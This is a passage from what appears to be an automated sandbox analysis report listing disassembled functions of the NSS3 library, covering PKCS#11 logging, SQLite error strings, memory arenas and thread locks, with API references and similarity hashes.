PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6CAB4C2D
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAB4C3F
PR_LogPrint.NSS3(?,00000000), ref: 6CAB4C55

Strings

C_DestroyObject, xrefs: 6CAB4BA1
hObject = 0x%x, xrefs: 6CAB4C17, 6CAB4C27
(CK_INVALID_HANDLE), xrefs: 6CAB4BDF, 6CAB4C35
hSession = 0x%x, xrefs: 6CAB4BC1, 6CAB4BD1

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hObject = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_DestroyObject
API String ID: 332880674-4243883364
Opcode ID: 0f0ced86df5199c4c46b25804d84f2ae6d865c1453118335a54718806a4f641b
Instruction ID: e6e7b2b3dd8cdfe168a52de51762e7aab6dec61ac4e324ea24b82a40d8187997
Opcode Fuzzy Hash: 0f0ced86df5199c4c46b25804d84f2ae6d865c1453118335a54718806a4f641b
Instruction Fuzzy Hash: E1310636601184ABDB009B54EE88F6E7779EB4BB59F084024F508B7701DB30AD88CBA2

Function 6CB54C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON

Download Yara Rule

APIs

sqlite3_value_text16.NSS3(?), ref: 6CB54CAF
sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CB54CFD
sqlite3_value_text16.NSS3(?), ref: 6CB54D44

Strings

out of memory, xrefs: 6CB54C78, 6CB54C9E
API call with %s database connection pointer, xrefs: 6CB54CF6
no more rows available, xrefs: 6CB54D2E
another row available, xrefs: 6CB54D20
abort due to ROLLBACK, xrefs: 6CB54D27, 6CB54D33
invalid, xrefs: 6CB54CF1
bad parameter or other API misuse, xrefs: 6CB54D05
unknown error, xrefs: 6CB54D56

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: sqlite3_value_text16$sqlite3_log
String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
API String ID: 2274617401-4033235608
Opcode ID: cc89aa0a7c18d54a78a652e0ff0eb81999bbf88c711f9f3062fbcf1af6bedfc9
Instruction ID: 7abea6857664fe5f563613347b73a9ce3af93d5bd145a886a81b2dd685597fd8
Opcode Fuzzy Hash: cc89aa0a7c18d54a78a652e0ff0eb81999bbf88c711f9f3062fbcf1af6bedfc9
Instruction Fuzzy Hash: EC313772A089E1A7D7044E28A8117F97361F7C3318FD50125D8245BE99DB21AC758FE3

Function 6CAB2DD0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitPIN), ref: 6CAB2DF6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CAB2E24
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAB2E33

Part of subcall function 6CB9D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB9D963

PR_LogPrint.NSS3(?,00000000), ref: 6CAB2E49
PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6CAB2E68
PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6CAB2E81

Strings

C_InitPIN, xrefs: 6CAB2DF1
ulPinLen = %d, xrefs: 6CAB2E7C
pPin = 0x%p, xrefs: 6CAB2E63
(CK_INVALID_HANDLE), xrefs: 6CAB2E2C
hSession = 0x%x, xrefs: 6CAB2E0E, 6CAB2E1E

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPin = 0x%p$ ulPinLen = %d$ (CK_INVALID_HANDLE)$C_InitPIN
API String ID: 1003633598-1777813432
Opcode ID: 3754925f937708cab51d825e50a24640601d2eafce16d0f28ff17473dfa57549
Instruction ID: 4df284300f2a0fadf104b73550f0bd681373aea3c741e18cadb7a2bc22146c35
Opcode Fuzzy Hash: 3754925f937708cab51d825e50a24640601d2eafce16d0f28ff17473dfa57549
Instruction Fuzzy Hash: 81312374601198ABDB009F55ED4CB4E3B79EB4A758F084025F808A7B11DB309D89CBA3

Function 6CAB6EF0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestUpdate), ref: 6CAB6F16
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CAB6F44
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAB6F53

Part of subcall function 6CB9D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB9D963

PR_LogPrint.NSS3(?,00000000), ref: 6CAB6F69
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6CAB6F88
PR_LogPrint.NSS3( ulPartLen = %d,?), ref: 6CAB6FA1

Strings

pPart = 0x%p, xrefs: 6CAB6F83
ulPartLen = %d, xrefs: 6CAB6F9C
(CK_INVALID_HANDLE), xrefs: 6CAB6F4C
hSession = 0x%x, xrefs: 6CAB6F2E, 6CAB6F3E
C_DigestUpdate, xrefs: 6CAB6F11

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPart = 0x%p$ ulPartLen = %d$ (CK_INVALID_HANDLE)$C_DigestUpdate
API String ID: 1003633598-226530419
Opcode ID: d1cb5517270686c84f851ed913ef6967a6cf25baacf992373a2d6ba95fdc4d0c
Instruction ID: cf592e2b2a3fa368d946f6b01e124e4e0c25c7b0436829a62e608a5555bd7a16
Opcode Fuzzy Hash: d1cb5517270686c84f851ed913ef6967a6cf25baacf992373a2d6ba95fdc4d0c
Instruction Fuzzy Hash: 4131F5346011949FDB04DB64ED48B9A77B9EB4A759F084024E808E7B12DF30998CCBA2

Function 6CA84880 Relevance: 18.2, APIs: 12, Instructions: 193memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA848A2
PORT_NewArena_Util.NSS3(00000800), ref: 6CA848C4
PORT_ArenaAlloc_Util.NSS3(?,000000BC), ref: 6CA848D8
memset.VCRUNTIME140(00000004,00000000,000000B8), ref: 6CA848FB
PORT_ArenaAlloc_Util.NSS3(?,00000018), ref: 6CA84908
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6CA84947
SECITEM_CopyItem_Util.NSS3(?,00000000,?), ref: 6CA8496C
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CA84988
SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CBA8DAC,?), ref: 6CA849DE
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA849FD
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CA84ACB

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Util$Alloc_ArenaError$Arena_Item_$CopyDecodeFreeQuickmemset
String ID:
API String ID: 4201528089-0
Opcode ID: 7a92f361452eb6afb694e1d86c2d9505fef5ab5b0b083027d841269b8818b71f
Instruction ID: ce3df2219e8fcf6805441deac52fea8722e733f8f73486f6392c12cfa05b0616
Opcode Fuzzy Hash: 7a92f361452eb6afb694e1d86c2d9505fef5ab5b0b083027d841269b8818b71f
Instruction Fuzzy Hash: 16512570A023048FEB108F65DC6179BB6ECAF4130CF184129E969AFB81EB75D4C8CB56

Function 6CB52D40 Relevance: 18.2, APIs: 12, Instructions: 187COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6CB52D9F

Part of subcall function 6CA0CA30: EnterCriticalSection.KERNEL32(?,?,?,6CA6F9C9,?,6CA6F4DA,6CA6F9C9,?,?,6CA3369A), ref: 6CA0CA7A
Part of subcall function 6CA0CA30: LeaveCriticalSection.KERNEL32(?), ref: 6CA0CB26

sqlite3_exec.NSS3(?,?,6CB52F70,?,?), ref: 6CB52DF9
sqlite3_free.NSS3(00000000), ref: 6CB52E2C
sqlite3_free.NSS3(?), ref: 6CB52E3A
sqlite3_free.NSS3(?), ref: 6CB52E52
sqlite3_mprintf.NSS3(6CBBAAF9,?), ref: 6CB52E62
sqlite3_free.NSS3(?), ref: 6CB52E70
sqlite3_free.NSS3(?), ref: 6CB52E89
sqlite3_free.NSS3(?), ref: 6CB52EBB
sqlite3_free.NSS3(?), ref: 6CB52ECB
sqlite3_free.NSS3(00000000), ref: 6CB52F3E
sqlite3_free.NSS3(?), ref: 6CB52F4C

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
String ID:
API String ID: 1957633107-0
Opcode ID: f57d199cb07f2280edfe6887e8f46d3532f59197dc0e9d8a2fed014d7c3958fb
Instruction ID: b9472440247cd139111e7f5a283398c5460f607e425fc45f7e96f4d7f523b31f
Opcode Fuzzy Hash: f57d199cb07f2280edfe6887e8f46d3532f59197dc0e9d8a2fed014d7c3958fb
Instruction Fuzzy Hash: 5261B0B5E022558BEB00CF68E994BDEB7B1EF4834CF544028DD05A7740E771E868CBA2

Function 6CAA2C40 Relevance: 18.2, APIs: 12, Instructions: 163COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(6CAA3F23,?,6CA9E477,?,?,?,00000001,00000000,?,?,6CAA3F23,?), ref: 6CAA2C62
EnterCriticalSection.KERNEL32(0000001C,?,6CA9E477,?,?,?,00000001,00000000,?,?,6CAA3F23,?), ref: 6CAA2C76
PL_HashTableLookup.NSS3(00000000,?,?,6CA9E477,?,?,?,00000001,00000000,?,?,6CAA3F23,?), ref: 6CAA2C86
PR_Unlock.NSS3(00000000,?,?,?,?,6CA9E477,?,?,?,00000001,00000000,?,?,6CAA3F23,?), ref: 6CAA2C93

Part of subcall function 6CB2DD70: TlsGetValue.KERNEL32 ref: 6CB2DD8C
Part of subcall function 6CB2DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CB2DDB4

TlsGetValue.KERNEL32(?,?,?,?,?,6CA9E477,?,?,?,00000001,00000000,?,?,6CAA3F23,?), ref: 6CAA2CC6
EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6CA9E477,?,?,?,00000001,00000000,?,?,6CAA3F23,?), ref: 6CAA2CDA
PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6CA9E477,?,?,?,00000001,00000000,?,?,6CAA3F23), ref: 6CAA2CEA
PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6CA9E477,?,?,?,00000001,00000000,?), ref: 6CAA2CF7
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6CA9E477,?,?,?,00000001,00000000,?), ref: 6CAA2D4D
EnterCriticalSection.KERNEL32(?), ref: 6CAA2D61
PL_HashTableLookup.NSS3(?,?), ref: 6CAA2D71
PR_Unlock.NSS3(?), ref: 6CAA2D7E

Part of subcall function 6CA707A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CA0204A), ref: 6CA707AD
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA0204A), ref: 6CA707CD
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA0204A), ref: 6CA707D6
Part of subcall function 6CA707A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CA0204A), ref: 6CA707E4
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,6CA0204A), ref: 6CA70864
Part of subcall function 6CA707A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CA70880
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,?,6CA0204A), ref: 6CA708CB
Part of subcall function 6CA707A0: TlsGetValue.KERNEL32(?,?,6CA0204A), ref: 6CA708D7
Part of subcall function 6CA707A0: TlsGetValue.KERNEL32(?,?,6CA0204A), ref: 6CA708FB

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
String ID:
API String ID: 2446853827-0
Opcode ID: 50dcec702a65848e007728eaec73ea27999913e72bfd57d3357ed083f3b9dff8
Instruction ID: fda8ea9ecd25f35b526f592e28621925c064cc7744cabd4f8d34640330d71bac
Opcode Fuzzy Hash: 50dcec702a65848e007728eaec73ea27999913e72bfd57d3357ed083f3b9dff8
Instruction Fuzzy Hash: 4251F7B5D00604AFEB009F75EC458AA77B8FF05358B188624ED1C97B12E731E9A9C7E1

Function 6CA04C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6CA03921,6CBE14E4,6CB4CC70), ref: 6CA04C97
EnterCriticalSection.KERNEL32(?,?,?,?,6CA03921,6CBE14E4,6CB4CC70), ref: 6CA04CB0
PR_Unlock.NSS3(?,?,?,?,?,6CA03921,6CBE14E4,6CB4CC70), ref: 6CA04CC9
TlsGetValue.KERNEL32(?,?,?,?,?,6CA03921,6CBE14E4,6CB4CC70), ref: 6CA04D11
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6CA03921,6CBE14E4,6CB4CC70), ref: 6CA04D2A
PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6CA03921,6CBE14E4,6CB4CC70), ref: 6CA04D4A
PR_Unlock.NSS3(?,?,?,?,?,?,?,6CA03921,6CBE14E4,6CB4CC70), ref: 6CA04D57
PR_GetCurrentThread.NSS3(?,?,?,?,?,6CA03921,6CBE14E4,6CB4CC70), ref: 6CA04D97
PR_Lock.NSS3(?,?,?,?,?,6CA03921,6CBE14E4,6CB4CC70), ref: 6CA04DBA
PR_WaitCondVar.NSS3 ref: 6CA04DD4
PR_Unlock.NSS3(?,?,?,?,?,6CA03921,6CBE14E4,6CB4CC70), ref: 6CA04DE6
PR_GetCurrentThread.NSS3(?,?,?,?,?,6CA03921,6CBE14E4,6CB4CC70), ref: 6CA04DEF

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
String ID:
API String ID: 3388019835-0
Opcode ID: 425337670ddc38eb2cce28d677bdf6860525b3c1becb380f47d0de8c6e7d0706
Instruction ID: b2d5e015fe60ff6b4dd3f71e9f87dfbae8cb6697c0f5324f389fded300a6cf7e
Opcode Fuzzy Hash: 425337670ddc38eb2cce28d677bdf6860525b3c1becb380f47d0de8c6e7d0706
Instruction Fuzzy Hash: 03418CB5A04B55CFCB00AF78E184159BBB4BF0A398F198669D888DB711E730E8C4CB81

Function 6CA8E910 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 149memorystringCOMMON

Download Yara Rule

APIs

PL_strncasecmp.NSS3(?,http://,00000007), ref: 6CA8E93B
PR_SetError.NSS3(FFFFE075,00000000), ref: 6CA8E94E
PORT_Alloc_Util.NSS3(00000001), ref: 6CA8E995
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6CA8E9A7
strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 6CA8E9CA
PORT_Strdup_Util.NSS3(6CBC933E), ref: 6CA8EA17
PORT_Alloc_Util.NSS3(00000001), ref: 6CA8EA28

Part of subcall function 6CAE0BE0: malloc.MOZGLUE(6CAD8D2D,?,00000000,?), ref: 6CAE0BF8
Part of subcall function 6CAE0BE0: TlsGetValue.KERNEL32(6CAD8D2D,?,00000000,?), ref: 6CAE0C15

memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6CA8EA3C
free.MOZGLUE(?), ref: 6CA8EA69

Strings

http://, xrefs: 6CA8E935

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Util$Alloc_memcpy$ErrorL_strncasecmpStrdup_Valuefreemallocstrtol
String ID: http://
API String ID: 3982757857-1121587658
Opcode ID: 2203c17f1744d244e1b02dc7dec05ba0ace1dcce855297b0f777dce7f1df8d4a
Instruction ID: 148b63e9c69669895ad958aa75a54a5bb8f19ad5a2f1306900ba0e1af5c6cc0e
Opcode Fuzzy Hash: 2203c17f1744d244e1b02dc7dec05ba0ace1dcce855297b0f777dce7f1df8d4a
Instruction Fuzzy Hash: 2C418E7CD4754ADBEF604AE88C407EAF7A5BB0731CF180021DCA597B41E25595C7C2E6

Function 6CACECE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6CACDE64), ref: 6CACED0C
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CACED22

Part of subcall function 6CADB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CBB18D0,?), ref: 6CADB095

PL_FreeArenaPool.NSS3(?), ref: 6CACED4A
PL_FinishArenaPool.NSS3(?), ref: 6CACED6B
PR_CallOnce.NSS3(6CBE2AA4,6CAE12D0), ref: 6CACED38

Part of subcall function 6CA04C70: TlsGetValue.KERNEL32(?,?,?,6CA03921,6CBE14E4,6CB4CC70), ref: 6CA04C97
Part of subcall function 6CA04C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CA03921,6CBE14E4,6CB4CC70), ref: 6CA04CB0
Part of subcall function 6CA04C70: PR_Unlock.NSS3(?,?,?,?,?,6CA03921,6CBE14E4,6CB4CC70), ref: 6CA04CC9

SECOID_FindOID_Util.NSS3(?), ref: 6CACED52
PR_CallOnce.NSS3(6CBE2AA4,6CAE12D0), ref: 6CACED83
PL_FreeArenaPool.NSS3(?), ref: 6CACED95
PL_FinishArenaPool.NSS3(?), ref: 6CACED9D

Part of subcall function 6CAE64F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6CAE127C,00000000,00000000,00000000), ref: 6CAE650E

Strings

security, xrefs: 6CACED06

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
String ID: security
API String ID: 3323615905-3315324353
Opcode ID: a1d23939879e71130b0071ef900a47a679854d82226d66e008c6c5e1087b17f4
Instruction ID: 9010c51195ce4fafcb4c7e0df6fc70501c3bbc92c48a5e4071407b84ba4d7f8b
Opcode Fuzzy Hash: a1d23939879e71130b0071ef900a47a679854d82226d66e008c6c5e1087b17f4
Instruction Fuzzy Hash: C8116A7AB002196BE6125721AD46BBF7278BF0974CF040D38E90072F41FB20A58CD6E7

Function 6CAB2CD0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 73COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitToken), ref: 6CAB2CEC
PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6CAB2D07

Part of subcall function 6CB909D0: PR_Now.NSS3 ref: 6CB90A22
Part of subcall function 6CB909D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CB90A35
Part of subcall function 6CB909D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CB90A66
Part of subcall function 6CB909D0: PR_GetCurrentThread.NSS3 ref: 6CB90A70
Part of subcall function 6CB909D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CB90A9D
Part of subcall function 6CB909D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CB90AC8
Part of subcall function 6CB909D0: PR_vsmprintf.NSS3(?,?), ref: 6CB90AE8
Part of subcall function 6CB909D0: EnterCriticalSection.KERNEL32(?), ref: 6CB90B19
Part of subcall function 6CB909D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CB90B48
Part of subcall function 6CB909D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CB90C76
Part of subcall function 6CB909D0: PR_LogFlush.NSS3 ref: 6CB90C7E

PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6CAB2D22

Part of subcall function 6CB909D0: OutputDebugStringA.KERNEL32(?), ref: 6CB90B88
Part of subcall function 6CB909D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6CB90C5D
Part of subcall function 6CB909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6CB90C8D
Part of subcall function 6CB909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB90C9C
Part of subcall function 6CB909D0: OutputDebugStringA.KERNEL32(?), ref: 6CB90CD1
Part of subcall function 6CB909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CB90CEC
Part of subcall function 6CB909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB90CFB
Part of subcall function 6CB909D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CB90D16
Part of subcall function 6CB909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6CB90D26
Part of subcall function 6CB909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB90D35
Part of subcall function 6CB909D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6CB90D65
Part of subcall function 6CB909D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6CB90D70
Part of subcall function 6CB909D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CB90D90
Part of subcall function 6CB909D0: free.MOZGLUE(00000000), ref: 6CB90D99

PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6CAB2D3B

Part of subcall function 6CB909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CB90BAB
